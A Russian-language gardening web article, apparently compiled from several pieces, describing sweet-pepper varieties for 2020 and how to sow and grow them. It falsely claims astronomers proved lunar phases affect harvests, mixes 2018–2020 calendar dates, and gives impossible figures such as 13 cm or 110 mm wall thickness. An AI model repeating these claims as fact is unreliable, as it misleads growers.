3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Новые сорта перца на 2020 год описание фото

Лучшие сорта сладкого перца на 2020 год для теплиц в Подмосковье подскажут опытные огородники

Болгарский перец считается очень «вредной» культурой. Растение требовательно к температуре и любит тепло. Тем не менее, человек сумел «найти общий язык» с перцем и успешно выращивает его в климатических условиях Подмосковья. В последние годы россияне сумели создать условия для взращивания растения в пределах Средней широты.

Труд селекционеров позволил приспособить к российскому климату многие сорта растений, которые дают хороший урожай даже при неспособствующих для этого погодных условиях. Новые виды растений наделены такими характеристиками, как холодостойкость, выносливость и способность противостоять распространенным заболеваниям. Они справляются при малом количестве солнечных дней и высокой влажности. Лучшие показатели урожайности демонстрируются в Центральном регионе, к которому относится и Подмосковье. Усваиваются ранние и среднеспелые сорта, которые еще до наступления холодов дарят плоды огородникам.

10 лучших сортов сладкого перца для теплицы

Абрикосовая фаворитка

Данному сорту сладкого перца характерен стабильно высокий урожай. Следует выращивать растение в теплице, но уже имеется успешный опыт высадки в открытый грунт. Кусты средней высоты поднимаются до 40-50 сантиметров. Плоды получают конусовидную форму, визуально они гладкие и блестящие. Толщина их стенок достигает 7 мм. При наступлении технической спелости перец обретает светло-зеленый цвет, который затем превращается в ярко-оранжевый.

Сорт предпочитают благодаря небольшим, но очень сочным плодам. Абрикосовую фаворитку можно употреблять как в свежем виде, так и в виде консервов.

Агаповский

Раннеспелый сорт обеспечивает высокую урожайность. Среднерослый небольшой куст в высоту достигает 60-80 сантиметров. Плоды вырастают гладкими и крупными, на них почти не видны ребра, ведь плод получает призмовидную форму. В процессе технической спелости перцы становятся темно-зелеными, а при биологической спелости приобретают ярко-красный цвет. Стенки имеют толщину 5-7 миллиметров. По мнению огородников, недостатком сорта является его склонность к болезни вершинной гнили. Но перец стойкий к вирусу табачной мозаики.

Атлант F1

Гибрид сладкого перца, обеспечивающий высокую урожайность. Высота растения редко превышает 80 сантиметров, поэтому можно выращивать его в пленочной теплице. Плод получил удлиненную форму в виде конуса. Визуально он глянцевый, а в период технической спелости приобретает зеленый цвет. Затем при созревании становится ярко-красным. Толщина стенки достигает 4-5 миллиметров.

Поклонники сорта высоко оценивают его вкус, приятный аромат и сочность плода. Можно употреблять в пищу свежие перцы или заготавливать их на зиму. Гибрид стоек к вирусам картофельной и табачной мозаики и легко переносит холода.

Белладонна F1

Сладкий перец, характеризуемый очень ранним сроком созревания. Огородники часто выращивают его в пленочных и стеклянных теплицах. Дачникам удается выращивать гибрид и в открытом грунте. Среднерослый компактный куст вырастает в высоту от 60 до 80 сантиметров. В технической спелости приобретает зеленовато-белый окрас, тогда как при биологической — он становится светло-желтым. Плоды получают кубовидную форму, визуально они гладкие и глянцевые. Толщина стенок перца в пределах 5-7 миллиметров. Сорт не подвержен вирусу табачной мозаики.

Богатырь

Высокоурожайный сорт средней спелости получил название благодаря своему внешнему виду. Раскидистый куст в высоту достигает 50-70 сантиметров. При технической спелости цвет плода светло-зеленый, а затем он становится насыщенно красным. Перец получил конусовидную форму, а толщина его стенок – 5-7 миллиметров.

Принято ценить сорт Богатырь за его стабильную урожайность. Кроме этого, растение является стойким к грибковым инфекциям и холодам. Не наблюдается вертицеллезное увядание. Отмечают стойкость сорта к транспортировке на большие расстояния. При этом растение хорошо сохраняется.

Звезда Востока шоколадная F1

Гибрид сладкого перца, характеризующийся ранней спелостью. Куст мощный и ветвистый, достигает 70 сантиметров в высоту. Плоды глянцевые и вырастают до крупных размеров. В период технической зрелости плоды имеют темно-зеленый окрас, а при наступлении биологической — становятся темно-коричневыми. Толщина стенок составляет до 10 миллиметров.

Огородники предпочитают данный сорт благодаря сладкому вкусу и сочной мякоти. Но основная причина почитания Звезды востока – ее стабильная и высокая урожайность. С 1 квадратного метра собирают 8-10 килограммов перца. Выделяют хорошую сохранность и стойкость к распространенным заболеваниям.

Изабелла F1

Среднеспелый гибрид высокой урожайности. Сладкий перец можно взращивать на открытом и закрытом грунте. Небольшой, но мощный куст вырастает в высоту до 60 сантиметров. Плоды получают призмовидную форму с толщиной стенок около 10 миллиметров. При техническом созревании их цвет зеленый, а на биологической стадии он становится ярко-красным. Выделяют вкусную и сочную мякоть перца, он отличается перечным ароматом. Гибрид не требователен к условиям взращивания, легко переносит транспортировку.

Калифорнийское чудо

Данный сорт является одним из наиболее популярных среди среднестатистических дачников. Куст достигает в высоту около 70 сантиметров. Плоды получили кубовидную форму, визуально они глянцевые и гладкие. При технической спелости перец обретает зеленый цвет, а при окончательном созревании становится красным. Толщина стенок плода – 4-5 миллиметров. Для огородников Калифорнийское чудо является излюбленным сортом, ведь он излучает сильный аромат. Поэтому редко плоды лежат на столе долго, а иногда их съедают прямо на грядке. В маринованном виде овощи также часто используются.

Сорт отличается высокой устойчивостью к вирусу табачной мозаики. Но не каждому огороднику удается получить богатый урожай при некомфортных погодных условиях и неприспособленной почве. Важно регулярно подкармливать грунт. Сорт Калифорнийское чудо будет плохо расти и слабо плодоносить, если в почве не окажется азотных удобрений. Кусты от этого становятся более мощными, но хуже плодоносят.

Кардинал F1

Данный гибрид относится к ультрараннеспелым. Его выращивают часто в условиях теплицы. Высота куста достигает 1 метра, поэтому лучше сразу приспособить теплицу к таким растениям. Кардинал при большом количестве места чувствует себя комфортней, ведь ничего не помешает ему развиваться. Плоды перца получили кубовидную форму. Они имеют большие размеры, поэтому масса нередко достигает 250-280 граммов.

При технической спелости растение приобретает зеленый цвет, который постепенно перерастает в темно-фиолетовый. Плоды очень сочные и мясистые, толщина их стенок достигает 8 миллиметров. Овощеводы, которые регулярно занимаются сортом Кардинал, выделяют не только стабильно хороший урожай, но и высокую устойчивость растения к вирусу табачной мозаики.

Ласточка

Данный сорт относится к раннеспелым. Сладкий перец выращивают как на открытом грунте, так и в пленочных теплицах. Средняя высота взрослых растений достигает высоты в 48-60 сантиметров. Плоды получают конусовидную форму, они гладкие на ощупь. В процессе созревания они приобретают салатовый цвет, а потом становятся красными. Толщина стенок плода составляет 6-7 миллиметров.

Ласточка не склонна к заболеванию вертициллезного увядания. Истинные поклонники овощей предпочитают употреблять перец в свежем виде. Но отмечают и пригодность растения к консервированию. Считается, что Ласточка может долго храниться и легко переносит переезды.

Тепличный перчик и его особенности

После того как рассада пересажена в землю, нужно еще в юном состоянии хорошо поливать перец. Если количество влаги будет недостаточным, на плодах появятся своеобразные «ожоги» — пятна красно-коричневого цвета. Если болгарский перец выращивается в тепличной среде, необходимо придерживаться ряда правил:

  • идеальное освещение. Но не стоит предоставлять слишком много солнечного света. Парниковые перцы, растущие под пленкой, чаще подвергаются ожогам, чем собратья, которые находятся в теплицах, выполненных из поликарбоната. Важно не перестараться и с притемнением. Если растение посажено в некомфортные условия, оно получил слабые завязи и не будет хорошо развиваться;

  • необходимо отслеживать температуру в теплице. Оптимальные условия роста перца – от 23 до 30 градусов Цельсия в теплице. Пагубно влияют на развитие растения резкие перепады температур. Они негативно скажутся на качестве и количестве плодов;
  • соблюдайте периодичность полива растений. Недостаточное количество влаги приведет к плохому урожаю. Периодически следует рыхлить почву. В таком состоянии в землю лучше проникает влага и кислород, необходимые для развития растения;
  • поддерживайте необходимый режим влажности. Сладкий перец предпочитает расти при умеренной влажности воздуха достигающей 70-75%. Из-за резких колебаний количества воды в воздухе перец начинает увядать. Его цветочки опадают, а вместе с ними гибнут и завязи. Плоды будут или слишком маленькими, или вовсе зачахнут.

Будьте осторожными! Первые 2-3 недели после пересадки рассады в теплицу вы вряд ли найдете повод для радости. Перец изначально кажется слабым и вялым. Но это первый этап становления растения и здесь нет ничего удивительного. Растение чувствительно к окружающей среде и не сразу адаптируется к предложенным условиям. Чтобы начался бурный рост, потребуется некоторое время.

Опытные дачники рекомендуют высаживать рассаду в теплицу в период, когда ее стебель выглядит травянистым. Это позволит в будущем быстрее прижиться и расти на новом грунте. Чтобы упростить процесс адаптации к земле, нужно регулярно рыхлить почву и опрыскивать растения стимуляторами «Энреген» и «Бутон». В этот период не стоит заниматься поливом.

Лучшие сорта перца + когда сажать перец на рассаду в 2020 году по лунному календарю

Традиционно, в первых числах весны садоводы начинают подготовку к дачному сезону. А именно начинают сеять рассаду овощей, в том числе, перцев. Семена, купленные в магазине, в готовых упаковках, должны пройти специальную обработку перед тем, как попадут в грунт. Иначе урожай может подвести и совсем не соответствовать вашим ожиданиям.

Разновидностей сортов на сегодняшний день великое множество. Современные селекционеры выводят все новые и новые виды перца, которые смогут устойчиво выстоять смены температур, недостаток солнечного света и так далее. Какой сорт выбрать и как правильно посеять семена на рассаду, вы узнаете из этой статьи.

Лучшие семена болгарского перца для Сибири

Даже такой теплолюбивый овощ, как болгарский перец можно вырастить в суровых условиях Сибири. Для этого обязательно нужно подобрать правильный сорт. Некоторыми фирмами, выпускающими семена, предусмотрены сорта овощей, разработанные именно для этого края. Сибирякам лучше выбирать раннеспелые виды, так как в условиях короткого лета они дадут наилучший урожай.

Исходя из характеристик и отзывов садоводов можно выделить следующие виды семян перцев для Сибири:

1.Сибирский князь. Отлично подходит для открытого грунта и тепличных помещений. От появления первых всходов до наливания плодов проходит в среднем 110 дней. Куст высокий и раскидистый. Форма плода вытянутая книзу, поверхность гладкая без выпирающих углов. Масса одного перца может достигать 170 грамм. Использовать овощ можно как для употребления в свежем виде, так и для заготовок.

2. Восточный базар. Куст средней высоты, компактный. Плоды ароматные и сочные на вкус. Толщина стенки до 1см. Сорт является среднеспелым. Использовать можно в любом направлении — свежие салаты, заготовки, заморозка и т.д.

3. Бивень. Название определяет внешний вид плода — он вытянутой и заостренной книзу формы, похожей на бивень. За свой плодоносный период один куст дает до 12 овощей средним весом 120г каждый. На вкус плоды сочные, с легким яблочным послевкусием. Подходят для любого вида употребления и переработки.

4. Сибирский формат. Это, пожалуй, один из самых крупных видов перца, которые можно вырастить в Сибири. Высота куста может достигать 1 метра. Один куст дает до 15 плодов, величиной 250-500г. В период созревания цвет плодов темно-зеленый. Готовность перца к сбору определяется ярко-красным цветом и глянцевой поверхностью.

5. Сибирский бонус. Ярко-оранжевые плоды разбавят тона зеленых грядок задорным цветом. Перцы крупные, массой до 400г. Куст высокий, листва компактно укрывает плоды от излишнего солнечного света. Вкусный и сладкий перец подойдет для любого вида употребления. 6. Сибирский валенок. Плоды толстостенные, массой до 200г. Сочные и ароматные на вкус. Куст компактный, но высокоурожайный. Универсальное применение зрелых овощей. Эти сорта отличаются устойчивостью к низким температурам, недостаткам тепла. Поэтому они прекрасно подойдут для сурового сибирского лета.

Когда сажать перец на рассаду в 2020 году по лунному календарю

Посадка перца на рассаду по лунному календарю 2019, начинается прежде всего с правильного подбора даты засева. Ведь современные астрономы давно доказали влияние фаз луны на благополучия урожая. Благо, вам не придется вычислять их самостоятельно, ведь на каждый год ученые составляют календарь.

Подходящие для посева семян перца дни, согласно лунному календарю 2018

  1. В феврале — 14, 15, 16, 23 и 25 число;
  2. В марте — 3, 4, 12, 14, 20, 22, 30, 31 число;
  3. В апреле — 9, 11, 18, 26, 27, 28 число.

Сладкие семена перца толстостенного для открытого грунта

При выборе семян стоит учитывать не только вкусовые и визуальные предпочтения к овощам, но и метод их выращивания. Некоторые дают наилучший урожай только в теплицах, а другие отлично растут и плодоносят в открытом грунте.

Для выращивания на открытой почве больше всего подойдут следующие сорта:

1.Блонди F1. Толщина стенок может достигать 1см. Плод сочный и сладкий. В условиях неприхотлив. При правильной агротехники дает богатый урожай. Средний вес перца 300г.

2. Атлант. Толстостенный плод, толщиной до 110мм. Хорошо плодоносит в почве после моркови и капусты. А вот соседство с огурцами может привести к минимальному плодоношению.

3. Ласточка. Миниатюрные плоды отлично подойдут для заморозки с целью дальнейшего фарширования. Однако и другие манипуляции с ним также уместны.

4. Толстый барон. Плоды массивные, толстостенные. Толщина мякоти 8мм. Обладает прекрасным вкусом и универсальностью использования.

5. Уральский толстостенный. Мясистые крупные плоды с невероятным вкусом. Очень сочные и хрустящие. Толщина стенок около 1см.

6. Дуняша. Очень вкусные перцы желтого цвета. Подойдут для любого вида переработки.

Если вы хотите вырастить сочные и мясистые овощи в открытом грунте, тогда эти сорта идеально подойдут.

Когда сеять перец на рассаду в Алтайском крае

Начинать посев рассады перцев стоит с наступлением весны. Однако, точная дата должна определяться с учетом выбранного сорта и спелости овоща.

Так, раннеспелый вид перцев лучше сеять в середине марта. Среднеспелые сорта дадут своевременный урожай, если их посеять в конце февраля — начале марта. А поздние перцы нужно садить уже в начале или середине февраля.

Для получения богатого урожая, опытные садоводы рекомендуют придерживаться лунного календаря. Благоприятные даты мы уже рассмотрели выше. Поэтому, выбранный вами сорт овощей нужно сеять, опираясь на эти дни.

Как проверить семена перца на всхожесть в соленой воде

Чтобы не тратить впустую свое время и не выращивать «кота в мешке», семена при посеве лучше проверить. А действительно ли они дадут ростки и всходы? Как это сделать мы обсудим прямо сейчас.

Отбор семян происходит простейшим образом. Для этого их нужно замочить в соленой воде на полчаса. Раствор должен быть негустым — на стакан воды берется всего один грамм соли, то есть 1/10 чайной ложки.

В стакан опускаем семена и ждем. Некоторые из них сразу уйдут на дно, некоторые опустятся позже. А те семечки, которые останутся на поверхности непригодны для выращивания.

Таким нехитрым способом, вы можете избавить себя от лишних хлопот — посева и полива семян, которые так и не прорастут.

Замачивание перцев перед посадкой и посев семян. Подготовка рассады

Если вы запланировали сеять рассаду, например, 14 марта, то подготовку к этому дню стоит начинать уже 1 числа этого месяца. Тем самым вы ускорите процесс появления всходов и количества ростков.

Подготовка семян для рассады проходит в два этапа:

  1. Сначала семечки нужно поместить в марлевый мешочек (делается он просто — марлю складывают в несколько раз, складывая ее в импровизированный узелок). Теперь его нужно замочить в растворе марганцовки. Цвет жидкости должен быть ярко-розовым. Процесс замачивания продлится 30 минут.
  2. Мешочек промыть вместе с семенами в проточной воде. Далее возьмите два ватных диска или другого материала, смочите и поместите между ними семена. Положите все в блюдце и периодически подливайте воды, чтобы семечки не засохли. Через пару недель семена прорастут и будут готовы к высадке в грунт.

Если вы — начинающий садовод, то эти советы, непременно, помогут вам вырастить идеальный урожай. А если же у вас есть опыт и секреты по уходу за перцами, то непременно делитесь ими с нами! Мы будем рады каждому комментарию!

Сорта перцев на посадку с фото и описанием

Болгарский перец относится к теплолюбивым культурам семейства пасленовых. Его плод считается ложной ягодой, пустотелой и содержащей множество семян. Болгарский или, как его еще называют, сладкий перец пришел в Россию из Латинской Америки. Там эта культура считается многолетней, а вот в местном климате, где лето короткое и прохладное, перцы растут лишь один сезон.

Для дачников и огородников накануне нового сезона актуален вопрос выбора сортов перца на посадку. Какие сорта перцев выбрать, как правильно выращивать этот овощ – все это можно узнать из данной статьи.

Чем отличаются сорта

Все сорта болгарского перца относятся к самоопыляемым. Для того чтобы появились завязи, не нужны насекомые или помощь человека – цветки опыляются без посторонней помощи.

Болгарский перец отличается по нескольким критериям , таким как:

  1. Форма и размеры плодов – бывают круглые овощи, продолговатые, очень крупные и мелкие.
  2. Оттенок овоща – встречаются плоды зеленого, красного, белого, фиолетового, желтого цветов.
  3. Сроки созревания – раннеспелые, средние и позднеспелые плоды.
  4. Сорта и гибриды.
  5. Период вегетации – время, которое необходимо для того, чтобы из семян выросли зрелые овощи.

Выбирая сорта перцев для участка, необходимо учитывать все эти качества – только так урожай будет радовать хозяина.

Как выращивают перец

Независимо от сорта, способ выращивания этих овощей практически не отличается. Болгарский перец, прежде всего, любит тепло . В южных регионах эти овощи можно выращивать прямо на грядках, а вот для Севера страны лучше выбрать стойкие к холодам гибридные сорта или высадить растения в теплицу.

В климате России сладкий перец нужно высаживать рассадным способом. Период вегетации у этого растения достаточно длительный – около 100 дней. Чтобы как-то сократить это время, рассаду начинают готовить уже в начале февраля.

Выбранный сорт перца необходимо подготовить к посадке, для этого:

  1. С осени выбирают подходящий участок – солнечное, защищенное от ветра место. Почва должна быть рыхлой и плодородной, с нейтральным уровнем кислотности.
  2. Грунт удобряют коровяком или птичьим пометом, можно купить готовое аммиачное удобрение. Рассыпают удобрения с осени перед вскапыванием участка. Но можно это сделать и весной, за пару недель до высадки рассады.
  3. Семена перцев сажают по схеме 6х6 см в общий ящик. Выдерживают под пленкой до появления первых ростков. Температура воздуха для нормального развития рассады должна быть в пределах 24-27 градусов.
  4. Когда появятся первые листочки, рассаду пикируют по одноразовым стаканчикам, в каждый из которых высаживают по одному растению.
  5. Высаживать в грунт можно саженцы с 7-8 настоящими листьями. Температура воздуха должна быть на уровне 20 градусов.
  6. Между рядами оставляют расстояние в 30-40 см, такие же промежутки оставляют между рассадой в одном ряду.

Перец нуждается в регулярном и обильном поливе , если растениям будет недостаточно влаги, они останутся низкими, а плоды будут карликовыми и недоразвитыми.

Болгарский перец длительно плодоносит – на кустиках появляются все новые и новые соцветия. В начале августа верхушки кустов нужно прищипнуть, а все цветы оборвать. Из них уже не успеет вызреть нормальный овощ, зато поздние завязи могут навредить растущим перцам.

Срывают болгарский перец слегка зеленоватым, он набирает зрелость при хранении. При таком подходе можно существенно повысить урожайность.

Лучшие сорта болгарского перца

Если почитать отзывы огородников и дачников из разных регионов страны, можно понять, что у каждого из них есть свой любимый сорт. Тем более что с каждым годом появляются все новые сорта, и 2020 год не станет исключением.

Выбор сорта должен основываться не только на предпочтениях хозяина, но и на характеристиках участка. Перцу нужен подходящий состав почвы, регулярный полив и тщательный уход – этот овощ не растет сам по себе, о нем нужно хорошо заботиться.

Следующим этапом в выборе сорта перца является способ его выращивания: в открытом грунте или в теплице. Для открытого грунта, особенно северных регионов, подходят только ранние сорта болгарского перца. Средние и позднеспелые перцы просто не успеют вызреть за короткий летний период.

Для юга и центра страны подойдут сорта с любой скоростью созревания, а вот для Севера лучше выбрать раннеспелый перец.

«Биг Мама»

Болгарский перец «Биг Мама» ценится за свои вкусовые качества – его мякоть очень ароматная и сочная. Плоды можно использовать для приготовления салатов, любых других блюд и консервирования.

Кусты вырастают высокими – до 100 см, и раскидистыми. На ветках много завязей с крупными плодами, весом до 200 грамм. Толщина стенок плода составляет около 13 см, это мясистый сорт.

Зрелые плоды окрашены в насыщенно-оранжевый цвет. Первыми овощами можно полакомиться на 120-ый день после высадки семян на рассаду. Выращивать овощ можно как в открытом грунте, так и в теплице.

«Богатырь»

Один из среднеспелых сортов – «Богатырь». Первые плоды появляются на кустах на 120-ый день после высевки семян. Кусты достаточно раскидистые и рослые – в высоту до 0,6 метров.

Молодые плоды окрашены в зеленый цвет, имеют слегка бугристую поверхность и призмообразную форму. К моменту наступления технической зрелости кожура меняет оттенок на ярко-красный. Толщина стенок плода составляет 5,5 мм.

Болгарский перец «Богатырь» обладает отменными вкусовыми качествами, его используют для приготовления холодных и горячих блюд, а также для консервирования.

Растить такой сорт можно и в теплице, и на грядке. С одного квадратного метра грунта можно получить до 7 кг крупных плодов, массой около 180 грамм. Культура устойчива к большинству типичных для перцев заболеваний.

«Ласточка»

Среднеранний сорт «Ласточка» дает плоды на 110-ый день после высадки в грунт. Перец пригоден для выращивания любым способом: в парнике, теплице или на грядке.

Для того чтобы собрать обильный урожай, необходимо отламывать верхние отростки до первого ответвления. Такая форма обеспечивает появление множества завязей на боковых ветках. Высота кустов достигает 0,6 метров.

Плоды получаются гладкими, имеют конусовидную форму и салатный оттенок. Срывать овощи можно, когда их кожура становится алой, а толщина стенок достигает 5 мм. Масса зрелого плода этого сорта составит 90 грамм.

При правильном уходе и формировании куста урожайность сорта достаточно высокая, плоды имеют хорошие вкусовые качества.

«Атлант»

Одним из ранних сортов, созревающих на 110-ый день, является «Атлант». Кусты этого растения небольшие, но раскидистые, листья тоже мелкие. А вот плоды вырастают крупными – массой до 170 грамм.

Зрелость овощей можно определить по ярко-зеленому окрасу кожуры. Сорванные овощи долго хранятся и хорошо переносят транспортировку, в процессе дозревания перцы становятся красными.

Внутри плод разделен на три камеры с семенами, мякоть довольно сочная – толщина стенок составляет 6 мм. При должном уходе с квадратного метра земли, засаженной этим сортом, можно получить до 5 кг овощей.

«Белозерка»

Болгарский перец «Белозерка» считается одним из самых распространенных на огородных участках России. Виной тому высокая урожайность – при грамотном уходе с метра почвы можно снять до 8 кг отличных овощей.

Плоды созревают на 112-ый день после высевки семян, что позволяет отнести «Белозерку» к ранним сортам. Форма их конусовидная, с заостренным кончиком. Кожура слегка ребристая, может иметь несколько оттенков – от бежевого до красного.

Толщина стенок плода достигает 7,5 мм, а масса одного овоща – 130 грамм. Плоды созревают дружно, отличаются отменными вкусовыми качествами. Перец этого сорта можно и есть в сыром виде, и консервировать, и мариновать.

Компактные кусты устойчивы к большинству заболеваний пасленовых культур. Перец можно выращивать в открытом грунте, урожайность сорта достигает 8 км². Овощи хорошо хранятся и транспортируются.

«Биг Папа»

Суперранний сладкий гибрид «Биг Папа» дает первые плоды уже на 92-ой день после высадки семян в почву. Культуру можно выращивать и в открытом грунте, и под временным укрытием. Кусты вырастают небольшими, имеют множество листьев и цветков.

Перцы можно срывать с кустов, когда их оттенок становится фиолетовым. Во время хранения происходит дозревание плодов, они приобретают темно-коричневый окрас. Форма плодов конусовидная, масса достигает 150 грамм, а толщина стенок – 8 мм.

Поэтому перцы сорта «Биг Папа» очень сочные и аппетитные. Они дают урожай до 9 кг и хорошо переносят транспортировку.

«Калифорнийское чудо»

Еще один раннеспелый сорт – «Калифорнийское чудо» дает первые плоды на 120-ый день после высадки семян. Кусты вырастают достаточно высокими, достигают 100 см. Выращивать их можно и под пленкой, и в открытом грунте.

Плоды имеют форму куба, ребристые стенки с 8 миллиметрами мякоти. Срывать плоды можно, когда их оттенок станет ярко-зеленым, после дозревания цвет меняется на красный.

Урожайность сорта составляет 3 кг с метра земли. Овощи подходят для употребления в свежем виде и консервирования.

«Оранжевое чудо»

Очень урожайный и раннеспелый сорт – «Оранжевое чудо». Перцы созревают на 110-ый день после высадки. Выращивать их лучше в южных регионах России, или использовать временные укрытия, теплицы.

Плоды отличаются ярко-оранжевой кожурой, форма их – кубическая. Масса одного перца может достигать 250 грамм. Овощи не только крупные, но и очень сочные, ведь толщина их стенок составляет 10 мм.

Кусты вырастают высокими, достигая 1 метра. Растение устойчиво к вирусу табачной мозаики и еще нескольким болезням. Перцы могут употребляться в сыром виде или использоваться для хранения, консервирования.

При правильном уходе с одного метра грядки можно снять до 14 кг овощей.

«Гогошары»

Один из самых востребованных сортов, относится к среднеспелым – первые плоды можно собирать на 120-ый день после высадки. Кусты вырастают маленькими и низкими – до 50 см. Сами перчики тоже небольшие – до 10 см в диаметре, имеют круглую форму и зеленый цвет. После созревания кожура перцев становится ярко-красной.

Масса одного плода составляет 50-80 грамм, мякоть довольно сочная, толщина стенок – 5 мм.

Выращивать болгарский перец сорта «Гогошары» можно как в укрытии, так и на грядке. Растение устойчиво к заболеваниям, отличается хорошей урожайностью – с каждого метра земли выходит до 5 кг овощей.

«Гладиатор»

Сорт лучше выращивать на защищенных от ветра участках – он имеет раскидистые кусты, в высоту достигающие 80 см. Растение устойчиво к характерным для перцев заболеваниям, дает высокие урожаи – до 5 кг.

Выращивать сорт перца лучше в открытом грунте, но можно и под временными укрытиями.

Перцы вырастают достаточно крупными, их масса составляет около 250 грамм. Цвет кожуры – желтый, форма – призмовидная, поверхность – глянцевая.

Толщина стенок плодов составляет 6 мм – перцы очень сочные и обладают сладковатым привкусом, особенным ароматом. В плодах содержится много витамина С и других полезных микроэлементов, поэтому их лучше есть сырыми. Но можно и консервировать, и солить, и тушить.

Первые овощи появятся на грядке не раньше 110-го дня после высевки семян. Зрелые перцы хорошо переносят транспортировку и могут храниться долгое время.

«Подарок Молдовы»

Один из самых излюбленных сортов болгарского перца, чаще остальных используемых отечественными дачниками и огородниками.

Этот перец полюбили за его отменный вкус и высокую урожайность. Культура подходит для выращивания в теплице и в открытом грунте. Способна приспосабливаться к климатическим условиям региона, но лучше всего плодоносит на юге.

Первые плоды появляются лишь на 130-ый день после высадки, зато созревают дружно. Это позволяет применять сорт для промышленного выращивания, когда овощи убирают не руками, а спецтехникой.

Кусты перца невысокие – всего 45 см, достаточно раскидистые. Сами перцы небольшие – массой до 90 грамм, но имеют толстую мякоть и приятный вкус.

Выращивать «Подарок Молдовы» можно не только на полях, но и в теплицах, и на огородных грядках.

Какие виды и сорта сажать весной 2020 года

На примере приведенных сортов перцев с фото и описанием показано, чем отличаются эти культуры, какие у них есть преимущества. Зная сильные и слабые стороны, легко выбрать наиболее подходящие к конкретному случаю сорта перца.

Важно помнить, что овощ должен быть не только красивым и урожайным, но еще и вкусным . В нем много витаминов и необходимых организму микроэлементов, перец нужно есть как в сыром виде, так и в приготовленном.

Лучшие сорта перцев для открытого грунта в 2020 году

Не за горами огородный сезон, пора приобретать, высевать первые культуры, в том числе и сорта перцев для открытого грунта, выбирая лучшие варианты для хорошего урожая 2020 года.

Перец – теплолюбивая культура родом из Центральной Америки, в природе насчитывается свыше 2 тысяч сортов. Но селекционеры изобрели в разы больше видов с улучшенными вкусом, цветом, ароматом, формой, толщиной стенок, размерами. Так что сейчас старательные овощеводы всегда могут найти подходящий тип для любых целей – консервации, салатов, украшения блюд.

Существуют семена для теплиц и открытого грунта, первые отличаются возможностью к самоопылению. Учитывая потребность культуры в тепле, выращивать ее на грядках можно лишь при достаточно теплом климате, а для северных регионов придется использовать теплицы с постоянной температурой.

В средней полосе России можно выращивать растение только рассадой, поскольку срок созревания дольше, чем природный теплый период, поэтому подходят ранние и среднеранние виды перца.

Не менее важно выбрать удачные семена согласно собственному вкусу (цвет, размер, толщина стенок, возможность использовать для консервации). Есть еще один нюанс – гибриды или сорта. Сорт является отбором культуры по определенным показателям, из таких растений можно получить семена, позднее используя их для создания рассады.

Такие перцы хороши, но значительно уступают в размере, вкусе, красоте гибридам, чьи особенности являются результатом скрещивания разных сортов. Но получить из них семенной материал невозможно. Точнее, после высадки его вырастет ничем не примечательное растение, наследующее неизвестные характеристики любого из предков.

Поэтому если хотите получить роскошный урожай – покупайте гибриды, отмеченные маркировкой F1. Если собираетесь получить постоянный источник семян – тогда отдавайте предпочтение сортам.

Ну и, конечно, для успеха нужно правильно высеять семена, укрепить рассаду, удачно высадить на постоянное место, ухаживать за грядкой. Но, хотя перец относится к капризным растениям, огородников это не пугает, а соблюдение ряда правил позволяет получить богатый урожай.

Лучшие сорта перцев для открытого грунта в средней полосе России

Для начала изучим самые урожайные сорта для выращивания на грядках средней полосы. Ведь кроме красоты отдельного плода хозяев и хозяек посадок волнует как раз объем выращенного перца, то есть, сколько килограмм продукта можно собрать с куста или квадратного метра. Чем больше, тем, разумеется, лучше.

  • «Капитошка» – невысокое раскидистое растение с плотными конусовидными красными плодами массой 50-83 г и достаточно толстыми стенками. Отличается дружным созреванием урожая, устойчив к болезням.
  • «Желтый слон» — кусты средней высоты с красивыми конусовидными плодами с острым кончиком, массой до 150 г. Урожайность стабильно высокая. Подходит для употребления в свежем виде и заморозки.
  • «Авангард» — урожайный среднеранний, поспевает на 115-125 сутки. Куст сильнорослый, индетерминантный, плоды призмовидные, зеленые при технической спелости, красные при биологической, массой до 450 г с толщиной стенок 6-7 мм. Урожай до 17 кг/кв.м.

«Боцман» — среднеранний высокоурожайный сорт, при хорошей погоде можно получить 16-18 кг с квадратного метра, созревание непрерывное, равномерное. Куст сильнорослый, плоды массой 390-500 г, темно-зеленые или красные, толстостенные.

Гибридные перцы

  • «Подарок Молдовы» — компактный куст высотой до 45 см, в подвязке не нуждается, плоды конусовидные, в биологической зрелости буро-красные, но употреблять можно и салатные. Длина до 12 см, вес – около 90-110 грамм, мякоть, ароматная, стенки достаточно толстые.
  • «Буратино» — высокоурожайный скороспелый, куст высотой до 100 см, плоды темно-зеленые, в спелости красные, массой до 120 г, длиной до 17 см, отлично хранятся, подходят для перевозки, консервирования.
  • «Желтый бык» — высокоурожайный гибрид, созревание на 95-108 день, плоды массой до 200г, сочные, удлиненной формы, цилиндрические с ярко выраженными ребрами.

Раннеспелые сорта болгарского перца для открытого грунта

К этому типу культуры относятся сорта, созревающие за 95-120 дней, они могут дать урожай даже прохладным непродолжительным летом до массового распространения фитофторы.

  • «Асти Йеллоу» — желтый высокоурожайный перец итальянского происхождения. Кусты средней высоты, мощные, с утолщенным центральным стеблем, плоды крупные, достигают 300 г, с толщиной стен до 1 см, цилиндрической формы с четко выраженными четырьмя гранями. Вкус яркий, мякоть хрустящая, сочная.
  • «Айвенго» — раннеспелый с созреванием на 125-135, устойчив к болезням, холодостойкий. Куст среднерослый, перцы среднего размера, урожайность до 6 кг с квадратного метра.
  • «Купец» — небольшое растение с плодами пирамидальной формы красного цвета при биологическом созревании, а техническом – зелено-бурого или зеленого. Мякоть сочная, плотная, стенки толстые.
  • «Тореадор» — ранний сорт, созревает на 95-105 сутки, растение низкорослое с толстыми, плотными стеблями, не требует опоры. Плоды шаровидные со слабо выраженными ребрами, красные или желтые, среднего размера (до 150 г), но урожайность высокая.

  • «Первенец Сибири» — скороспелый, созревает максимум на 120 сутки, размеры хоть и небольшие, как и сам куст, но их много, урожайность до 12 кг/кв.м.
  • «Геркулес» — крупноплодный сорт, поспевает через 75-85 дней после посадки на грядки. Кусты разлогие (порой требуют подвязки), невысокие, плоды массой до 300 г с мясистыми стенками толщиною до 1 см, форма кубическая, при биологическом созревании цвет красный.
  • «Биг мама» — на грядке куст вырастает до 70 см, крупного размера (весом до 200 г), прямоугольные, красивого оранжевого цвета, с интересным вкусом. Подходит для употребления в свежем виде и термической обработки.
  • «Белозерка» — ультраранний тип культуры, устойчив к болезням, перепадам температур, неприхотлив к почве. Кусты невысокие, крепкие, плоды конусовидные небольшого размера, при созревании желтого цвета с хрустящей мякотью. Сорт универсальный, идеален для кулинарной обработки (фарширования в том числе благодаря небольшому размеру, красивой форме), употребления в свежем виде, консервирования, заморозки.

Холодостойкие виды перцев для Урала и Сибири

